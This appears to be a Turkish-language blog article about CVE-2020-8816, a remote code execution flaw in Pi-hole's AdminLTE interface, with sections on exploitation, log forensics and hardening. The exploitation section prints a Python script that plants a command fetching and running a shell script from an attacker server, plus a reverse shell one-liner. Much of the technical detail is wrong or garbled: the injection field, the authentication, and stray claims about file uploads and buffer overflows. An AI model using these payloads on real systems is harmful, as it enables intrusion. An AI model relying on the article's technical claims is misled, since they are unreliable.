CVE-2020-8816 · Bilgilendirme

Pi-Hole AdminLTE Remote Code Execution Vulnerability

CVE-2020-8816 zafiyeti, Pi-hole Web v4.3.2'de uzaktan kod yürütülmesine olanak tanır. Güvenliğinizi tehdit eden bir açık!

Üretici
Pi-hole
Ürün
AdminLTE
Seviye
yüksek
Yayın Tarihi
05 Nisan 2026
Okuma
8 dk okuma

CVE-2020-8816: Pi-Hole AdminLTE Remote Code Execution Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2020-8816, Pi-hole'un AdminLTE arayüzünde bulunan bir uzaktan kod yürütme (RCE - Remote Code Execution) zafiyetini ifade eder. 2020 yılında keşfedilen bu zafiyet, Pi-hole’un 4.3.2 versiyonundaki belirli işlevlerin, yetkili kullanıcılar tarafından kötüye kullanılmasına olanak tanır. Zafiyetin temelindeki sorun, DHCP statik atamasını işlemek için kullanılan kodda meydana gelen bir hatadır. Bu açık, yetkili bir kullanıcı tarafından kullanıldığında, saldırganın sunucuda kendi kodunu çalıştırmasına günümüzdeki birçok sistemde potansiyel riskler yaratabilmektedir.

Zafiyetin keşfi, özellikle ağ yöneticilerine ve çeşitli kuruluşlara yönelik büyük tehditle sonuçlanmıştır. Ancak bu durum sadece belirli bir kullanıcı grubunu etkilemekle kalmamış, aynı zamanda çeşitli sektörleri de kapsamaktadır. Özellikle evinde Pi-hole kullanan kullanıcılar, küçük işletmeler veya teknoloji tabanlı çözümler sunan firmalar bu konuda büyük risk almıştır. Örneğin, bir saldırgan, bu açığı kullanarak bir açık DHCP sunucusu aracılığıyla kurumsal ağlara sızabilir. Böylece, kritik verilere erişim sağlama veya kötü amaçlı yazılımlar ile ağa zarar verme riski doğar.

Zafiyetin kaynağı, AdminLTE arayüzünün DHCP ayarlarını işleme biçiminde yatmaktadır. Kötü niyetli bir kullanıcı, özgün biçimde düzenlenmiş bir DHCP statik atamasıyaratabilir ve bu atama sayesinde uzaktan kod çalıştırabilir. Örneğin, “.php” uzantılı bir dosya yükleyerek, sunucu üzerinde yetkisiz erişim sağlayan bir script’i tetikleyebiliriz. Bu durum, hacı ağaç gövdesinin içini boşaltmayı ve veri sızıntılarına yol açmayı sağlayan bir etki yaratabilir ve böylelikle sıradan bir kullanıcı, sunucunun kontrolünü ele geçirebilir.

Zafiyetin sektöre olan etkisi geniş kapsamlı olmuştur. Eğitim, sağlık, finans ve IT sektörleri, bu tür açıklar yüzünden artan veri ihlalleri ve kötü niyetli sızmalarla karşı karşıya kalmıştır. Zira Pi-hole, birçok siber güvenlik çözümü sunan şirket tarafından yaygın olarak tercih edilmektedir; bu nedenle, zayıf halkaların kapatılmadığı bir durumda, bu yazılımı kullanan tüm kuruluşlar ciddi tehditler altında kalmaktadır. Bu bağlamda, “buffer overflow” (tampon taşması) ve “authorization bypass” (yetkilendirme atlatma) gibi yöntemler, bu tür açıklar üzerinden çok daha kolay bir şekilde gerçekleştirilebilir.

CVE-2020-8816’nın önlenmesi için alması gereken tedbirler arasında; güncellemelerin takip edilmesi, güvenlik duvarı kurulumları ve sistem güvenliğinin sağlanması yer alır. Kurumlar, bu tür açıkların varlığını kontrol etmek amacıyla sürekli olarak güvenlik denetimleri gerçekleştirmeli ve potansiyel tehditlere karşı önleyici adımlar atmalıdır. Sonuç olarak, karşı karşıya kalınan zafiyetler, her zaman potansiyel riskler taşır ve bu risklerin farkında olarak hareket etmek, siber güvenlik profesyonellerinin en önemli sorumluluklarından biridir.

Teknik Sömürü (Exploitation) ve PoC

Pi-hole, ağınızdaki reklamları ve kötü niyetli içerikleri engellemeye yönelik popüler bir DNS (Domain Name System) çözümüdür. Ancak, 2020 yılında keşfedilen CVE-2020-8816 açığı, AdminLTE yönetim arayüzü aracılığıyla uzaktan kod çalıştırma (RCE - Remote Code Execution) riski taşımaktadır. Bu açık özellikle yetkili kullanıcıların, kötü niyetli olarak oluşturulmuş DHCP sabit kiralamalarından (static leases) yararlanarak uzaktan sistemlere zarar vermesine olanak tanımaktadır. Bu makalede, bu açığın nasıl sömürülebileceğine dair adım adım bir kılavuz sunulacaktır.

İlk olarak, hedef sistemdeki Pi-hole sürümünün 4.3.2 veya daha düşük olup olmadığını kontrol edelim. Bu sürümdeki Administratif arayüze erişim olan herkesin bu açığı exploit etme şansı bulunmaktadır. Hedef sistemin IP adresini bilmek, işlemler açısından büyük önem taşımaktadır.

Pi-hole üzerinde, DHCP ayarlarının yapılandırıldığı bağlantıya giderek, mevcut sabit kiralamaları incelemeliyiz. Örnek bir HTTP isteği göndererek mevcut sabit kiralamaları çekelim:

GET /admin/dhcp.php HTTP/1.1
Host: <hedef-ip>
Authorization: Bearer <token>

Yukarıdaki komut, hedef Pi-hole sunucusunun DHCP ayarlarını listeleyecektir. Eğer bu isteklere yetkili bir kullanıcı olarak erişiyorsak, kötü niyetli bir sabit kiralama oluşturabileceğimiz aşamasına geçebiliriz.

Şimdi, DHCP üzerinden yorum çalıştırabilecek bir sabit kiralamanın nasıl oluşturulabileceğine bakalım. Bu işlem, bir kod parçasının yazılması ile mümkündür. Aşağıda, bu aşamada kullanılabilecek bir Python exploit taslağı verilmiştir:

import requests

url = "http://<hedef-ip>/admin/dhcp.php"
payload = {
    "MAC": "01:23:45:67:89:AB",
    "IP": "192.168.1.100",
    "hostname": "malicious",
    "comment": "malicious_code; bash -c 'curl http://<attack-server>/shell.sh | bash'"
}

response = requests.post(url, data=payload, headers={"Authorization": "Bearer <token>"})

if response.status_code == 200:
    print("Sabit kiralama başarıyla oluşturuldu.")
else:
    print("Bir hata oluştu:", response.status_code)

Bu kod, belirtilen MAC adresine sahip bir cihaza tehlikeli komutlar çalıştıran bir sabit kiralama oluşturmaktadır. Kullanım önerilen yöntemi düzgün bir şekilde uyguladığınızda duyarlı sistemler üzerinde uzaktan kod çalıştırma riski doğacaktır. Bu bağlamda, eğer sunucu zararlı kodu çalıştırırsa, bu durumda sunucu üzerinde istediğiniz komutları yürütme şansına sahip olabilirsiniz.

Başarılı bir şekilde exploit gerçekleştirdikten sonra, kötü niyetli komutları çalıştırabiliyor olduğunuzu doğrulamak için sunucu ile iletişimi kontrol edebilirsiniz. Başka bir örnekte, uzaktan bir shell elde etmek için aşağıdaki gibi bir komut çalıştırabilirsiniz:

bash -i >& /dev/tcp/<attack-server>/<port> 0>&1

Bu komut, sunucudan kötü niyetli bir bağlanma sağlar ve sizin kontrolünüzdeki bir sunucuya bağlantı kurar.

Sonuç olarak, CVE-2020-8816 açığı, Pi-hole kullanıcıları için ciddi bir tehdit oluşturmaktadır. Spam veya reklam engelleme amacıyla kullanılan sistemlerin bu tür güvenlik açıklarına karşı korunması oldukça önemlidir. Dolayısıyla, sistemlerinizi güncel tutmalı, yönetim arayüzüne erişebilen kullanıcıları sıkı bir şekilde denetlemeli ve güvenlik önlemlerini artırmak adına DHCP ayarlarınızı daha dikkatli bir şekilde yapılandırmalısınız. White hat hacker olarak, bu tür tehditleri önceden tespit etmek ve gerekli önlemleri almak sisteminizin güvenliğini artıracaktır.

Forensics (Adli Bilişim) ve Log Analizi

CVE-2020-8816, Pi-hole ve AdminLTE kullanıcıları için kritik bir uzaktan kod yürütme (RCE - Remote Code Execution) açığıdır. Bu zafiyet, 4.3.2 sürümünde, yetkili bir kullanıcı tarafından hazırlanmış bir DHCP statik kiralama ile gerçekleştirilebilir. Siber güvenlik uzmanları için, bu tür bir açığın farkına varmak ve etkilerini analiz etmek son derece önemlidir. Özellikle, adli bilişim (forensics) ve log analizi yapan profesyoneller, bu tür saldırıları tespit etmek için gerekli bilgileri toplamada kritik bir rol oynamaktadır.

Bu tür bir RCE açığı, genellikle kötü niyetli bir kullanıcının yetkilerini kötüye kullanarak sisteme zararlı kodlar yüklemesine olanak sağlar. Bir siber saldırganın amacı, genellikle sistemde derinlemesine bir etki yaratmak ve gizli bilgilere erişmektir. Bu tür bir durumda, siber güvenlik uzmanları, uygun log analizi ve SIEM (Security Information and Event Management) sistemleri ile problemi tespit etmelidir.

Öncelikle, siber güvenlik uzmanları log dosyalarını (access log, error log vb.) incelemelidir. Bu loglarda özellikle dikkat edilmesi gereken birkaç imza (signature) bulunmaktadır:

  1. Yetkisiz Erişim Girişimleri: Log dosyalarında görünen şüpheli IP adresleri veya kaynaklar, yetkisiz erişim girişimlerini gösterebilir. Yetkili kullanıcıların girişi dışında olan veya alışılmadık zaman dilimlerinde gerçekleşen tüm erişimler araştırılmalıdır.
   192.168.1.100 - - [01/Oct/2023:10:21:34 +0300] "GET /adminLTE DHCP_request" 200
  1. Şüpheli DHCP Statik Kiralamaları: Uygulama loglarında, tipik dışındaki DHCP statik kiralamaları ve kullanıcı davranışları dikkatlice izlenmelidir. Özellikle, yetkili kullanıcıların yaptığı anormal kiralama değişikliklerini belirlemek önemlidir. 
   DHCPREQUEST for 192.168.1.150 from 00:11:22:33:44:55 via br-lan
  1. Kötü Amaçlı Kod Yürütme Denemeleri: Log dosyalarında belirli bir zaman diliminde yüksek sayıda hata mesajının görünmesi, uzaktan kod yürütme girişimlerinin bir işareti olabilir. Özellikle "500 Internal Server Error" gibi hata mesajları, sistemde bir şeylerin yanlış gittiğini gösterir.
   [error] [client 192.168.1.20] PHP Fatal error: Uncaught Error: Class 'malicious_class' not found
  1. Anormal Kullanıcı Davranışları: Kullanıcı hesaplarından gelen şüpheli istekler veya girişimlerin sıklığı, hesabın ele geçirilmiş olabileceğini gösterebilir. Bu tür anomaliler, kullanıcı davranışını inceleyerek tespit edilebilir.
   User [admin] accessed restricted area multiple times in a short period.

Sonuç olarak, Pi-hole ve AdminLTE platformları üzerinde CVE-2020-8816 gibi RCE açıklarını tespit etmek, etkili bir log analizi ve SIEM kullanımı ile mümkün olmaktadır. Siber güvenlik uzmanları, bu tür saldırıları belirlemek için dikkatli bir izleme ve analiz süreci uygulamalıdırlar. Kullanıcı işlemleri, network trafiği ve hata mesajları üzerinde detaylı bir inceleme, potansiyel zafiyetleri zamanında tespit etmek için kritik öneme sahiptir.

Savunma ve Sıkılaştırma (Hardening)

Pi-hole, kullanıcıların reklamları engelleme ve internet trafiğini izleme imkanı sunan popüler bir ağ düzeyindeki reklam engelleyicidir. Ancak, CVE-2020-8816 koduyla bilinen bir güvenlik açığı, özellikle AdminLTE arayüzü üzerinden uzaktan kod yürütme (RCE - Remote Code Execution) saldırılarına kapı aralamaktadır. Bu açığın, yetkili kullanıcıların oluşturduğu hatalı DHCP (Dynamic Host Configuration Protocol) statik kiralamaları ile tetiklendiği bilinmektedir. Bu makalede, bu açığın nasıl kapatılacağı, alternatif güvenlik duvarı (WAF - Web Application Firewall) kuralları ve kalıcı sıkılaştırma önerileri üzerinde duracağız.

Öncelikle, bu açığın etkilerini anlamak için gerçek dünya senaryolarına bakalım. Bir sistem yöneticisi, Pi-hole'un web arayüzü üzerinden DHCP ayarlarını yapılandırırken, kötü niyetli bir kullanıcı, içerideki bir statik IP kiralaması tanımlayabilir. Bu durumda, bu kiralamaya yerleştirilmiş zararlı kod, sistemde uzaktan çalıştırılabilir hale gelir. Dolayısıyla, sadece yetkili kullanıcıların bile ihlale neden olabileceği bir senaryo ortaya çıkmaktadır.

Açığın kapatılmasında ilk adım, Pi-hole ve AdminLTE'nin en güncel sürümüne güncellenmesidir. Her güncellemede güvenlik açıkları için yamalar sağlanır ve mevcut sistemin daha güvenli hale gelmesi sağlanır. Bunun dışında, web arayüzüne erişimi kısıtlamak için şu önlemler alınabilir:

  1. Güvenli Ağ Konfigürasyonu: Pi-hole'a erişimin yalnızca belirli IP adresleriyle sınırlandırılması. 
sudo nano /etc/pihole/setupVars.conf

Bu dosyada, belirli IP adreslerinin dışında kimsenin erişimini engelleyin.

  1. HTTPS'ye Geçiş: Yönetim panelinizin yalnızca HTTPS üzerinden erişilmesini sağlamak önemlidir. Böylece iletişim şifrelenir ve man-in-the-middle saldırılarına karşı bir önlem alınmış olur.
sudo apt install certbot
sudo certbot certonly --standalone -d yourdomain.com
  1. Kullanıcı Erişim Kontrolü: AdminLTE arayüzüne erişimi yalnızca gerekli kullanıcılarla sınırlamak. Kullanıcı rolleri oluşturmak ve minimum ayrıcalık prensibi uygulamak kritik öneme sahiptir.

Bunların yanı sıra, alternatif bir WAF (Web Application Firewall) kullanarak ek bir güvenlik katmanı oluşturabilirsiniz. Örneğin, ModSecurity ile kurulan bir WAF, şüpheli istekleri filtreleyerek sisteminizi koruyabilir. Herhangi bir şüpheli isteği tespit etmek için aşağıdaki kuralları kullanabilirsiniz:

SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off
SecRule REQUEST_URI "@contains /admin" "id:1000001,phase:1,deny,status:403,msg:'Admin panel access blocked'"

Bu örnek, Admin paneline erişimi kısıtlamak için bir kural oluşturmaktadır. Ayrıca, potansiyel RCE denemelerini tespit etmek için belirli regex kalıplarını kullanabilirsiniz.

Son olarak, kalıcı sıkılaştırma (hardening) önerileri arasında sistem güncellemelerinin düzenli olarak yapılması, gereksiz hizmetlerin devre dışı bırakılması ve güvenlik duvarı kurallarının gözden geçirilmesi yer almaktadır. Sunucu içindeki gereksiz kullanıcı hesaplarının kaldırılması ve şifrelerin karmaşıklığı göz önünde bulundurularak oluşturulması da kritik öneme sahiptir.

Tüm bu önlemler, CVE-2020-8816 açığına karşı etkili bir koruma sağlayacak ve Pi-hole'unuzu daha güvenli hale getirecektir. Unutulmaması gereken en önemli noktalar, güvenliğin sürekli bir süreç olduğu ve düzenli denetimlerin yapılması gerektiğidir.